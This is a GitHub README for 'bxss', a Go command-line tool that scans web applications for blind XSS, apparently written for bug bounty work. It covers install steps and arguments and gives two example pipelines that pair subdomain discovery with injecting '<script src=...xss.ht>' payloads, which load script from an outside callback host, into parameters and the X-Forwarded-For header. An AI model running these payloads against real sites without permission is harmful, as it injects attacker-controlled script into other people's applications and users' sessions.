Skip to content

Latest commit

 

History

History
75 lines (52 loc) · 2.94 KB

README.md

File metadata and controls

75 lines (52 loc) · 2.94 KB
Raw


Bxss

Bxss - Blind XSS Scanner

Version License: MIT Go Report Card Go Reference

Description

Blind XSS Scanner is a tool that can be used to scan for blind XSS vulnerabilities in web applications.

Features

  • Inject Blind XSS payloads into custom headers
  • Inject Blind XSS payloads into parameters
  • Uses Different Request Methods (PUT,POST,GET,OPTIONS) all at once
  • Tool Chaining
  • Really fast
  • Easy to setup

Install

go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest

Arguments

Argument Description Default
-appendMode Append the payload to the parameter
-concurrency int Set the concurrency 30
-header string Set the custom header "User-Agent"
-headerFile string Path to file containing headers to test
-parameters Test the parameters for blind xss
-payload string The blind XSS payload
-payloadFile string Path to file containing payloads to test

Demonstration

asciicast

Blind XSS In Parameters

subfinder uber.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://hacker.xss.ht></script>' -parameters

Blind XSS In X-Forwarded-For Header

subfinder uber.com | gau | bxss -payload '"><script src=https://z0id.xss.ht></script>' -header "X-Forwarded-For"

If you get a bounty please support by buying me a coffee


Buy Me A Coffee